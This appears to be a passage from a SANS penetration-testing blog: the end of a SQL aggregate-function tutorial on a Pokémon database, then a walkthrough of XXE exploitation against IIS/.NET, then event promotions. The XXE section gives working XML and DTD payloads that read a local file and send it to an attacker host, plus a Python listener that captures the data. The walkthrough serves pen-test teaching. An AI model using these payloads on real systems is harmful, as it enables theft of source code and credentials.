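print(row)  # (3, 60, 330, 600, 200.0)
```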

An aggregate function that I use all the time is COUNT. Want to know how many Pokémon fall into the genus of mouse?

sqlite> select count(genus) from pokemon_species_names
...> where genus = "Mouse" and local_language_id = 9;
6

OK, it was 6. That seems a little anti-climactic.

In this example, count(genus) counts the rows in the result set that match the WHERE clause. This is often used simply to count the total number of records in a table:

sqlite> .headers on
sqlite> select count(*) as "Total" from pokemon_species_names;
Total
6094

Here I also took the opportunity to demonstrate how we name an aggregate function column. Using the syntax AS "Total" after the aggregate function allows me to reference the aggregate column by name.

Aggregate functions become very useful when you combine them with the GROUP BY operator. Previously we looked for the number of Pokémon in the mouse genus, but what if we want to get a count of how many Pokémon belong to each of the genera? (NB: I had to Google “plural of genus” for that.)

sqlite> select count(name) count, genus from pokemon_species_names
...> where local_language_id = 9 group by genus order by count desc;
count|genus
8|Dragon
6|Mouse
6|Mushroom
5|Balloon
5|Flame
5|Fox
4|Bagworm
4|Bat
4|Cocoon
4|Drill
4|Fairy
4|Poison Pin
4|Seed
4|Tadpole
3|Big Jaw
3|Bivalve
3|Cottonweed
3|EleFish
3|Electric
3|Flower

The GROUP BY operator here groups each of the return results into a set by the specified genus column. By naming the aggregate function column “count”, I was able to reference it later in the ORDER BY clause as well.

Understanding GROUP BY and aggregate functions gives you powerful tools for analyzing SQL data. Use them to identify the number of credit cards disclosed in a compromise, or to count breached records grouped by states that have mandatory breach-reporting requirements, for example.

Whew! That was a lot of SQL for one article. Master these techniques though, and you’ll be well on your way to getting useful and meaningful data out of SQL databases in your pen-test post-compromise phase. For more interesting SQL lessons specifically using the Pokémon Pokedex database, check out Dandelion Mané’s PokemonSQLTutorial project too!

-Josh Wright
@joswr1ght

SANS Note:

Would you like (4) printed copies of the new SANS Penetration Testing Curriculum poster mailed directly to you?


Then register for the upcoming webcast detailing the new poster, by Ed Skoudis, on January 9th at 1pm EST, and we will mail the printed posters to you after the webcast has aired.

This is for the brand new “Blueprint: Building a Better Pen Tester” poster.

Register now for this free educational webcast and to receive (4) printed copies of the new SANS Pen Test Poster!

Exploiting XXE Vulnerabilities in IIS/.NET

By Chris Davis

XXE (XML External Entity) attacks happen when an XML parser improperly processes input from a user that contains an external entity declaration in the doctype of an XML payload. This external entity may contain further code which allows an attacker to read sensitive data on the system or potentially perform other more severe actions.

This article will demonstrate the steps necessary to perform an XXE attack against IIS servers using the Microsoft .NET framework. However, this article will not go into great depth in explaining how these technologies fundamentally work. Please reference the useful links sections below if you would like to know more about these technologies.

XXE Exploitation

Below we can see an external parameter entity named extentity being declared, using the SYSTEM directive to load the contents of a URI. Then %extentity; is referenced in order to trigger an HTTP GET request to that URI.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil">
     %extentity;
     ]
>

Alternatively, this same directive could be used to access a file locally on a system:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml">
     %extentity;
     ]
>

However, XML imposes well-formedness restrictions that prohibit the example above. The file at c:/inetpub/wwwroot/Views/secret_source.cshtml would not be loaded, and the parser would instead produce an error.

What about entity inception? We could try to embed an entity within an entity within our XML payload. For example:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
    <!ELEMENT demo ANY >
    <!ENTITY % extentity "<!ENTITY stolendata SYSTEM 'file:///c:/inetpub/wwwroot/Views/secret_source.cshtml'>">
    %extentity;
    ]
>

Unfortunately, this is also not possible, due to XML well-formedness rules prohibiting parameter entity references within markup declarations in the internal DTD subset.

We know that we cannot reference a local file directly, but we can have the parser fetch a resource from a URI. We could attempt to load a Document Type Definition (DTD) file to accomplish this instead. DTD files are loaded before an XML file is parsed and tell the parser how to properly interpret the XML. Let’s attempt to embed our restricted entity payloads in a remote DTD file to bypass these restrictions.

For example, we could load the following xml file into our parser which points to a DTD file. When %extentity; is called, it loads the contents of our DTD file (evil.dtd) at the provided URI:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil.dtd">
     %extentity;
      ]
>

We would then need to have a web server listening on port 4444 at the above IP address with the evil.dtd file located at the root of the web directory. What’s in this magical DTD file you ask? Well, I’ll show you:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">

Line 1 of the above DTD file declares the XML version and encoding. Line 2 declares an entity that grabs the contents of a sensitive file. In line 3 we perform entity inception and append the contents referenced by stolendata to a URI pointing at our web server listening on port 4444. By doing this, we bypass the XML well-formedness restrictions that blocked the entities we tried to embed earlier in our original XML payload.

[Figure: the XML payload causes the parser to fetch and load evil.dtd from the attacker's web server]

The above illustration shows us the first few steps of the process:

1. We upload our original XML payload which points the system to load a DTD file from our remote web server.

2. The XML parser reaches out to the designated URI to retrieve DTD contents.

3. XML parser loads the contents of the DTD into the pre-processing of the original XML payload.

At this point, we have successfully bypassed the well-formed restrictions. However, we still need to call the entities we declared in our DTD file in order to retrieve the contents of secret_source.cshtml and send them back to our webserver. To do this, we would need to insert %inception; and %sendit; after %extentity; in our original XML file before we send the payload. Our original XML payload should now look something like this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
    <!ELEMENT demo ANY >
    <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil.dtd">
    %extentity;
    %inception;
    %sendit;
    ]
>

[Figure: the parser exfiltrates secret_source.cshtml back to the attacker, embedded in the GET request URI]

That’s it! As long as we have a web server or a Netcat listener set up on port 4444, the XML parser will send back the contents of the target file (secret_source.cshtml) embedded in the URI of the GET request. Source files exfiltrated this way often contain sensitive information like database passwords and encryption keys, which can then be leveraged to reach more valuable content.
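For the listener side, a minimal Python stand-in for Netcat might look like the sketch below. The port 4444 matches the payloads above; this is an illustrative sketch, not hardened code:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, unquote

received = []  # captured query strings, one per callback

class ExfilHandler(BaseHTTPRequestHandler):
    """Log the query string of each GET request -- that's where the
    exfiltrated file contents arrive, URL-encoded after the '?'."""

    def do_GET(self):
        data = unquote(urlparse(self.path).query)
        received.append(data)
        print("Exfiltrated:", data)
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass  # silence the default per-request logging

# Uncomment to wait for the XML parser's callback:
# HTTPServer(("0.0.0.0", 4444), ExfilHandler).serve_forever()
```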

Note: There are certain limitations to this technique as the XML parser will produce an error if the file content exceeds 2000 bytes in total length due to URI length restrictions.

Useful Links:

OWASP: XML External Entity (XXE) Processing

XML Security Cheat Sheet

Microsoft: ENTITY (XML) .NET Framework

W3schools: XML DTD

-Chris Davis
Counter Hack

Upcoming SANS Special Event – 2018 Holiday Hack Challenge


SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive role-playing video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free, 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen